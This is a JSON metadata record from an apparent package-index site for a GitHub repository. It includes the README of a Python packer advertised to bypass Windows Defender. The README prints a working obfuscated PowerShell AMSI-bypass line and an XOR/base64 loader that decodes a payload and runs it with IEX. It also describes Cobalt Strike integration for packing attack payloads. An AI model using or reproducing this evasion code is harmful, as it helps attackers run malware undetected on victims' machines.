{"id":13815181,"url":"https://github.com/Unknow101/FuckThatPacker","last_synced_at":"2025-05-15T07:32:05.766Z","repository":{"id":37781780,"uuid":"287210747","full_name":"Unknow101/FuckThatPacker","owner":"Unknow101","description":"A simple python packer to easily bypass Windows Defender","archived":false,"fork":false,"pushed_at":"2022-04-03T18:20:01.000Z","size":15,"stargazers_count":628,"open_issues_count":3,"forks_count":84,"subscribers_count":14,"default_branch":"master","last_synced_at":"2024-11-19T10:48:56.587Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Unknow101.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-08-13T07:26:07.000Z","updated_at":"2024-11-04T23:31:12.000Z","dependencies_parsed_at":"2022-07-12T16:52:43.432Z","dependency_job_id":null,"html_url":"https://github.com/Unknow101/FuckThatPacker","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unknow101%2FFuckThatPacker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unknow101%2FFuckThatPacker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unknow101%2FFuckThatPacker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unknow101%2FFuckThatPacker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Unknow101","download_url":"https://codeload.github.com/Unknow101/FuckThatPacker/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254295966,"owners_count":22047179,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T04:03:05.777Z","updated_at":"2025-05-15T07:32:02.820Z","avatar_url":"https://github.com/Unknow101.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# FuckThatPacker\nA simple python packer to easily bypass Windows Defender\n\n# Basic usage\n\n```\n# python FuckThatPacker.py --help\n\n ___ _ _____ _ _ ___ _ \n | __| _ __| |_|_ _| |_ __ _| |_| _ \\__ _ __| |_____ _ _ \n | _| || / _| / / | | | ' \\/ _` | _| _/ _` / _| / / -_) '_|\n |_| \\_,_\\__|_\\_\\ |_| |_||_\\__,_|\\__|_| \\__,_\\__|_\\_\\___|_| \n \n \nWritten with \u003c3 by Unknow101/inf0sec\nv1.0\n\n\nusage: FuckThatPacker.py [-h] -k KEY -p PAYLOAD [-o OUTPUT]\n\noptional arguments:\n -h, --help show this help message and exit\n -k KEY, --key KEY integer key use of XOR operation\n -p PAYLOAD, --payload PAYLOAD\n path of the payload to pack\n -o OUTPUT, --output OUTPUT\n output payload into file\n```\n\n# Exemple\n\nBasic generation of xor payload :\n\n```\n# python FuckThatPacker.py -k 32 -p /root/payload.ps1\n\n ___ _ _____ _ _ ___ _ \n | __| _ __| |_|_ _| |_ __ _| |_| _ \\__ _ __| |_____ _ _ \n | _| || / _| / / | | | ' \\/ _` | _| _/ _` / _| / / -_) '_|\n |_| \\_,_\\__|_\\_\\ |_| |_||_\\__,_|\\__|_| \\__,_\\__|_\\_\\___|_| \n \n \nWritten with \u003c3 by Unknow101/inf0sec\nv1.0\n\n\n[+] Encode UTF16-LE\n[+] Cyphering Payload ...\n[+] Base64 Payload\n[+] Writting into Template\n[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType((\"{5}{2}{0}{1}{3}{6}{4}\" -f 'ut',('oma'+'t'+'ion.'),'.A',('Ams'+'iUt'),'ls',('S'+'ystem.'+'Manage'+'men'+'t'),'i')).GetField((\"{1}{2}{0}\" -f ('Co'+'n'+'text'),('am'+'s'),'i'),[Reflection.BindingFlags](\"{4}{2}{3}{0}{1}\" -f('b'+'lic,Sta'+'ti'),'c','P','u',('N'+'on'))).GetValue($null),0x41414141)\n$a = \"395zIEUgVCANIHMgVCBS[...]iBdICog\"\n$b = [System.Convert]::FromBase64String($a)\nfor ($x = 0; $x -lt $b.Count; $x++) {\n $b[$x] = $b[$x] -bxor 32\n }\nIEX ([System.Text.Encoding]::Unicode.GetString($b))\n```\n\n# CobaltStrike Integration\n\n17/03/2022 : FuckThatPacker is now integrated to CobaltStrike !\n\n## Setup\n\nAt this time, FuckThatPacker should be installed in /opt/Tools/FuckThatPacker (or you can manualy edit the aggressor script).\nAfter this, you have to load the CNA script into cobalt strike (help : https://trial.cobaltstrike.com/aggressor-script/index.html)\nYou should have a new label under the attacks menu :\n\n![New lavel](https://i.ibb.co/8Xzhb0V/Screenshot-1.png)\n\nThen, you have to specify the listener, the key and the output :\n\n![Menu](https://i.ibb.co/x3ywKnS/Screenshot-3.png)\n\nThe payload will be generated and packed :\n\n![Packed payload](https://i.ibb.co/dG0SBr4/Screenshot-4.png)\n\n\n\n# AV Results\n\n![AV detection](https://i.ibb.co/fdQJD4Y/Screenshot-1.png)\n\n# Patch Notes\n\n13/11/2020 : Modifying template.txt for Defender signature :D\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FUnknow101%2FFuckThatPacker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FUnknow101%2FFuckThatPacker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FUnknow101%2FFuckThatPacker/lists"}